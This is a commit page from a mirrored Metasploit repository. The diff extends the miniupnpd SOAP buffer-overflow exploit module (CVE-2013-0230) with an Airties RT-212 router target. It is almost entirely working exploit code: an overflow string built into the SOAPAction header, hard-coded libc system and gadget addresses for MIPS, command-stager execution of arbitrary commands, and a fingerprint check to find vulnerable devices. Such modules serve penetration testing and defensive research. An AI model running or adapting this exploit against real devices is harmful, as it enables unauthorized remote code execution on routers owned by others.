infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge Airties target inside miniupnpd_soap_bof

jvazquez-r7 2015-05-22 11:57:19 -05:00
parent d8b8017e0b
commit 70d0bb1b1a
No known key found for this signature in database
GPG Key ID: 38D99152B9352D83
1 changed files with 115 additions and 14 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

129
modules/exploits/linux/upnp/miniupnpd_soap_bof.rb
View File

@ -7,6 +7,8 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
Rank = NormalRanking Rank = NormalRanking
def initialize(info = {}) def initialize(info = {})
@ -19,20 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'hdm', # Vulnerability discovery 'hdm', # Vulnerability discovery
'Dejan Lukan' # Metasploit module 'Dejan Lukan', # Metasploit module, debian target
'Onur ALANBEL', # Expliot for Airties target
'm-1-k-3' # Metasploit module, Airties target
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'DefaultOptions' => { 'EXITFUNC' => 'process', },
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
# of the program is never reached)
'Payload' =>
{
'Space' => 2060,
'BadChars' => "\x00\x22",
'DisableNops' => true
},
'Platform' => 'linux', 'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_MIPSBE],
'References' => 'References' =>
[ [
[ 'CVE', '2013-0230' ], [ 'CVE', '2013-0230' ],
@ -40,14 +36,39 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'BID', '57608' ], [ 'BID', '57608' ],
[ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play'] [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play']
], ],
'Targets' => 'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[ [
[ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0', [ 'Debian GNU/Linux 6.0 / MiniUPnPd 1.0',
{ {
'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd 'Ret' => 0x0804ee43, # pop ebp # ret # from miniupnpd
'Offset' => 2123 'Offset' => 2123,
'Arch' => ARCH_X86,
# the byte '\x22' is the '"' character and the miniupnpd scans for that character in the
# input, which is why it can't be part of the shellcode (otherwise the vulnerable part
# of the program is never reached)
'Payload' =>
{
'Space' => 2060,
'BadChars' => "\x00\x22"
},
:callback => :target_debian
} }
], ],
[ 'Airties RT-212 v1.2.0.23 / MiniUPnPd 1.0',
{
'Offset' => 2048,
'LibcBase' => 0x2aabd000,
'System' => 0x00031AC0,
'CallSystem' => 0x0001CC94, # prepare $a0 and jump to $s0
'Fingerprint' => 'AirTies/ASP 1.0 UPnP/1.0 miniupnpd/1.0',
'Arch' => ARCH_MIPSBE,
:callback => :target_airties
}
]
], ],
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'Privileged' => false, 'Privileged' => false,
@ -57,9 +78,40 @@ class Metasploit3 < Msf::Exploit::Remote
register_options([ register_options([
Opt::RPORT(5555), Opt::RPORT(5555),
], self.class) ], self.class)
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => '/'
})
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
fingerprints = targets.collect { |t| t['Fingerprint'] }
fingerprints.delete(nil)
if res && fingerprints.include?(res.headers['Server'])
vprint_status("Fingerprint: #{res.headers['Server']}")
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end end
def exploit def exploit
unless self.respond_to?(target[:callback])
fail_with(Failure::BadConfig, 'Invalid target specified: no callback function defined')
end
self.send(target[:callback])
end
def target_debian
# #
# Build the SOAP Exploit # Build the SOAP Exploit
# #
@ -108,7 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
# #
# Build and send the HTTP request # Build and send the HTTP request
# #
print_status("Sending exploit to victim #{target.name} at ...") print_status("Sending exploit to victim #{target.name}...")
send_request_cgi({ send_request_cgi({
'method' => 'POST', 'method' => 'POST',
'uri' => "/", 'uri' => "/",
@ -121,4 +173,53 @@ class Metasploit3 < Msf::Exploit::Remote
# disconnect from the server # disconnect from the server
disconnect disconnect
end end
def target_airties
print_status("Sending exploit to victim #{target.name}...")
execute_cmdstager(
:flavor => :echo
)
end
def execute_command(cmd, opts)
# Build the SOAP Exploit
# a valid action
sploit = "n:schemas-upnp-org:service:WANIPConnection:1#"
sploit << rand_text_alpha_upper(target['Offset'])
sploit << [target['LibcBase'] + target['System']].pack("N") # s0 - address of system
sploit << rand_text_alpha_upper(24) # $s1 - $s6
sploit << [target['LibcBase'] + target['CallSystem']].pack("N")
# 0001CC94 addiu $a0, $sp, 0x18
# 0001CC98 move $t9, $s0
# 0001CC9C jalr $t9
# 0001CCA0 li $a1, 1
sploit << rand_text_alpha_upper(24) #filler
sploit << cmd
# data sent in the POST body
data =
"<?xml version='1.0' encoding=\"UTF-8\"?>\r\n" +
"<SOAP-ENV:Envelope\r\n" +
" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\"\r\n" +
" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\n" +
">\r\n" +
"<SOAP-ENV:Body>\r\n" +
"<ns1:action xmlns:ns1=\"urn:schemas-upnp-org:service:WANIPConnection:1\" SOAP-ENC:root=\"1\">\r\n" +
"</ns1:action>\r\n" +
"</SOAP-ENV:Body>\r\n" +
"</SOAP-ENV:Envelope>\r\n"
send_request_cgi({
'method' => 'POST',
'uri' => '/',
'headers' =>
{
'SOAPAction' => sploit,
},
'data' => data
})
end
end end